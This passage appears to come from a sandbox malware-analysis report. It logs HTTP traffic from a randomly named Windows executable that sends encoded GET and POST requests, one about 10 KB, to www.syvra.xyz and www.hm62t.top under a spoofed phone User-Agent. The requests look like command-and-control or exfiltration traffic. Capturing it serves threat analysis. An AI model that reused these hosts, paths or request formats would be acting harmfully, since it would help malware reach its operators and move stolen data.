                      Sep 13, 2024 12:27:55.566066980 CEST | 1236 | IN | Data Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                      Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                      Sep 13, 2024 12:27:55.566101074 CEST | 1236 | IN | Data Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                      Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                      Sep 13, 2024 12:27:55.566137075 CEST | 896 | IN | Data Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                      Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                      Sep 13, 2024 12:27:55.566170931 CEST | 1236 | IN | Data Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                      Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                      Sep 13, 2024 12:27:55.566204071 CEST | 1236 | IN | Data Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                      Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
                      Sep 13, 2024 12:27:55.566237926 CEST | 448 | IN | Data Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                      Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
                      Sep 13, 2024 12:27:55.566291094 CEST | 1236 | IN | Data Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                      Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                      Sep 13, 2024 12:27:55.566329002 CEST | 1236 | IN | Data Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                      Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"
                      Sep 13, 2024 12:27:55.572108030 CEST | 1236 | IN | Data Raw: 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31
                      Data Ascii: one;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.59463,27.24606


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      8 | 192.168.2.4 | 50409 | 162.0.213.94 | 80 | 3120 | C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 13, 2024 12:27:57.415049076 CEST | 479 | OUT | GET /h2bb/?MtXH8dRH=qJKXiU3Y6HiR5EQ+73Yb2xdirYIwqZi0pOwD+eljRGtAAZDjMN2OxhxU5kptMPcWm3rk9DqOdiozjqcfWB2Wk1O1f7az6dmfaFVy77DKkP1oB1oCVi4cG1g=&EB04T=0hSTF8phw HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Host: www.syvra.xyz
                      Connection: close
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Sep 13, 2024 12:27:58.009443045 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Date: Fri, 13 Sep 2024 10:27:57 GMT
                      Server: Apache
                      Content-Length: 16052
                      Connection: close
                      Content-Type: text/html; charset=utf-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                      Sep 13, 2024 12:27:58.009497881 CEST | 1236 | IN | Data Raw: 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34
                      Data Ascii: /linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
                      Sep 13, 2024 12:27:58.009533882 CEST | 1236 | IN | Data Raw: 37 39 20 2d 30 2e 35 39 35 32 33 33 2c 2d 31 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34
                      Data Ascii: 79 -0.595233,-18.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;str
                      Sep 13, 2024 12:27:58.009566069 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 30 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c
                      Data Ascii: width="100.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /
                      Sep 13, 2024 12:27:58.009613991 CEST | 1236 | IN | Data Raw: 38 2e 36 36 36 33 31 20 31 2e 32 34 39 39 32 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32
                      Data Ascii: 8.66631 1.249922,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000
                      Sep 13, 2024 12:27:58.009651899 CEST | 1236 | IN | Data Raw: 31 2c 38 2e 30 32 34 30 36 20 30 2e 32 39 36 35 31 2c 31 2e 35 32 31 36 35 20 30 2e 32 32 32 39 39 2c 31 2e 30 36 35 37 39 20 30 2e 31 34 39 33 33 2c 30 2e 36 30 39 31 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73
                      Data Ascii: 1,8.02406 0.29651,1.52165 0.22299,1.06579 0.14933,0.60912" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4533"
                      Sep 13, 2024 12:27:58.009691000 CEST | 1236 | IN | Data Raw: 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20
                      Data Ascii: -width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541" d="m 85.206367,122.98266 c 0.117841,11.74369 0.235693,23.48835 0.235693,36.55072 -10e-7,13.06238 -0.117833,27.43
                      Sep 13, 2024 12:27:58.009721041 CEST | 108 | IN | Data Raw: 34 36 37 32 20 2d 31 31 2e 39 31 32 38 30 38 2c 32 36 2e 37 30 30 33 33 20 2d 32 2e 32 39 38 33 39 34 2c 36 2e 39 35 33 36 32 20 2d 32 2e 32 39 38 33 39 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30
                      Data Ascii: 4672 -11.912808,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,
                      Sep 13, 2024 12:27:58.009752035 CEST | 1236 | IN | Data Raw: 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a
                      Data Ascii: 34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path
                      Sep 13, 2024 12:27:58.009804964 CEST | 224 | IN | Data Raw: 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66
                      Data Ascii: 289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4
                      Sep 13, 2024 12:27:58.014846087 CEST | 1236 | IN | Data Raw: 2e 36 37 31 35 37 31 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 72 78 3d 22 32 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 79 3d 22 32 33 38 2e 30 38 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 31 31 39 2e 31
                      Data Ascii: .6715717" rx="2.5" cy="238.08525" cx="119.12262" id="path4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.0015747


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      9 | 192.168.2.4 | 50410 | 154.23.184.240 | 80 | 3120 | C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 13, 2024 12:28:03.566529989 CEST | 733 | OUT | POST /edpl/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.hm62t.top
                      Origin: http://www.hm62t.top
                      Content-Length: 205
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.hm62t.top/edpl/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 6e 39 5a 37 70 2b 45 42 4f 45 6c 4a 62 39 2b 37 47 62 75 4f 50 70 7a 64 47 31 6f 49 6f 7a 74 42 41 61 78 47 6d 55 34 4f 69 75 32 6c 59 4b 5a 46 70 4f 33 57 62 35 66 73 46 6c 37 54 76 2f 36 38 39 64 35 33 6f 44 78 2f 51 65 7a 35 71 41 31 70 7a 35 44 67 4f 6c 65 7a 55 45 58 5a 4a 2f 76 65 37 6a 33 35 48 64 64 45 33 31 4c 55 36 2b 71 57 5a 34 4e 73 50 37 41 5a 35 36 57 34 77 38 41 6c 4b 36 67 43 44 4a 50 73 53 2b 59 73 6b 51 72 42 4d 2b 4b 4d 47 54 43 33 6e 71 66 63 62 4f 79 58 6e 52 50 64 31 52 76 6a 59 73 36 41 45 76 64 33 2b 34 54 54 71 41 52 75 55 65 54 38 78 6b 4e 74 4e 77 3d 3d
                      Data Ascii: MtXH8dRH=n9Z7p+EBOElJb9+7GbuOPpzdG1oIoztBAaxGmU4Oiu2lYKZFpO3Wb5fsFl7Tv/689d53oDx/Qez5qA1pz5DgOlezUEXZJ/ve7j35HddE31LU6+qWZ4NsP7AZ56W4w8AlK6gCDJPsS+YskQrBM+KMGTC3nqfcbOyXnRPd1RvjYs6AEvd3+4TTqARuUeT8xkNtNw==
                      Sep 13, 2024 12:28:04.472018957 CEST | 312 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Fri, 13 Sep 2024 10:28:04 GMT
                      Content-Type: text/html
                      Content-Length: 148
                      Connection: close
                      ETag: "66a8e223-94"
                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      10 | 192.168.2.4 | 50411 | 154.23.184.240 | 80 | 3120 | C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 13, 2024 12:28:06.104347944 CEST | 753 | OUT | POST /edpl/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.hm62t.top
                      Origin: http://www.hm62t.top
                      Content-Length: 225
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.hm62t.top/edpl/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 6e 39 5a 37 70 2b 45 42 4f 45 6c 4a 61 63 4f 37 45 34 32 4f 4a 4a 7a 63 49 56 6f 49 2b 44 74 46 41 61 39 47 6d 57 55 65 68 63 53 6c 5a 72 70 46 6f 4d 50 57 63 35 66 73 4f 46 37 57 77 76 36 69 39 63 46 2f 6f 47 52 2f 51 65 6e 35 71 42 46 70 79 4b 37 2f 63 6c 65 78 63 6b 58 62 57 76 76 65 37 6a 33 35 48 64 49 72 33 31 6a 55 36 50 61 57 49 71 6c 76 46 62 41 61 36 36 57 34 30 38 41 35 4b 36 67 77 44 4d 71 4a 53 39 67 73 6b 52 62 42 4d 76 4b 50 66 44 43 78 6f 4b 65 66 66 4e 6a 53 72 45 33 64 38 43 4c 36 66 2b 2b 6b 49 4a 4d 74 76 4a 79 45 34 41 31 64 4a 5a 61 49 38 6e 77 6b 57 78 61 76 76 35 5a 56 4e 70 41 4b 72 52 53 67 6b 41 63 6d 55 31 49 3d
                      Data Ascii: MtXH8dRH=n9Z7p+EBOElJacO7E42OJJzcIVoI+DtFAa9GmWUehcSlZrpFoMPWc5fsOF7Wwv6i9cF/oGR/Qen5qBFpyK7/clexckXbWvve7j35HdIr31jU6PaWIqlvFbAa66W408A5K6gwDMqJS9gskRbBMvKPfDCxoKeffNjSrE3d8CL6f++kIJMtvJyE4A1dJZaI8nwkWxavv5ZVNpAKrRSgkAcmU1I=
                      Sep 13, 2024 12:28:07.015767097 CEST | 312 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Fri, 13 Sep 2024 10:28:06 GMT
                      Content-Type: text/html
                      Content-Length: 148
                      Connection: close
                      ETag: "66a8e223-94"
                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      11 | 192.168.2.4 | 50412 | 154.23.184.240 | 80 | 3120 | C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 13, 2024 12:28:08.649504900 CEST | 10835 | OUT | POST /edpl/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.hm62t.top
                      Origin: http://www.hm62t.top
                      Content-Length: 10305
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.hm62t.top/edpl/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 6e 39 5a 37 70 2b 45 42 4f 45 6c 4a 61 63 4f 37 45 34 32 4f 4a 4a 7a 63 49 56 6f 49 2b 44 74 46 41 61 39 47 6d 57 55 65 68 63 61 6c 59 64 39 46 6f 72 62 57 64 35 66 73 53 31 37 58 77 76 37 6e 39 64 74 46 6f 47 55 43 51 64 66 35 70 6a 4e 70 36 62 37 2f 57 6c 65 78 65 6b 58 59 4a 2f 75 65 37 6a 47 77 48 64 59 72 33 31 6a 55 36 4e 43 57 59 49 4e 76 57 4c 41 5a 35 36 57 4b 77 38 41 64 4b 36 34 67 44 4e 72 38 53 4e 41 73 6c 78 4c 42 4b 64 53 50 58 44 43 7a 76 4b 65 39 66 4e 76 5a 72 45 43 6d 38 44 76 41 66 38 69 6b 59 66 78 7a 2f 4d 53 6b 37 54 68 43 62 65 36 66 37 6e 73 61 4e 78 75 74 2f 70 5a 61 58 36 4d 62 6d 42 48 56 79 46 78 6e 4b 69 78 67 66 4c 6e 46 76 67 41 59 74 73 2b 47 4e 68 41 71 49 38 38 33 4b 56 6e 64 37 77 6e 30 62 69 42 37 30 67 78 66 6a 78 59 6d 31 74 78 75 57 58 4c 61 4e 53 56 41 41 64 76 74 6f 5a 34 54 6c 6d 7a 47 4a 39 76 66 79 4c 39 35 61 74 33 6e 47 41 4d 79 76 4e 4c 6f 72 32 58 4e 53 61 78 34 4d 43 51 43 4b 75 38 6b 39 41 41 53 74 44 74 77 66 68 64 71 6e [TRUNCATED]
                      Data Ascii: MtXH8dRH=[TRUNCATED]
                      Sep 13, 2024 12:28:09.804702997 CEST | 312 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Fri, 13 Sep 2024 10:28:09 GMT
                      Content-Type: text/html
                      Content-Length: 148
                      Connection: close
                      ETag: "66a8e223-94"
                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      12 | 192.168.2.4 | 50413 | 154.23.184.240 | 80 | 3120 | C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 13, 2024 12:28:11.194531918 CEST | 479 | OUT | GET /edpl/?MtXH8dRH=q/xbqOJEbFxqZdP5Pq3VIJihKFYuoTJpC6d7rXUvusGBValkv/SoX8DUGkqJst/hxOtwmyY8Q6nb8zkY9ZrFeAmdQleBPpTMkSiDA6E42mjQ0ujKW4BvX8M=&EB04T=0hSTF8phw HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Host: www.hm62t.top
                      Connection: close
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Sep 13, 2024 12:28:12.118376970 CEST | 312 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Fri, 13 Sep 2024 10:28:11 GMT
                      Content-Type: text/html
                      Content-Length: 148
                      Connection: close
                      ETag: "66a8e223-94"
                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
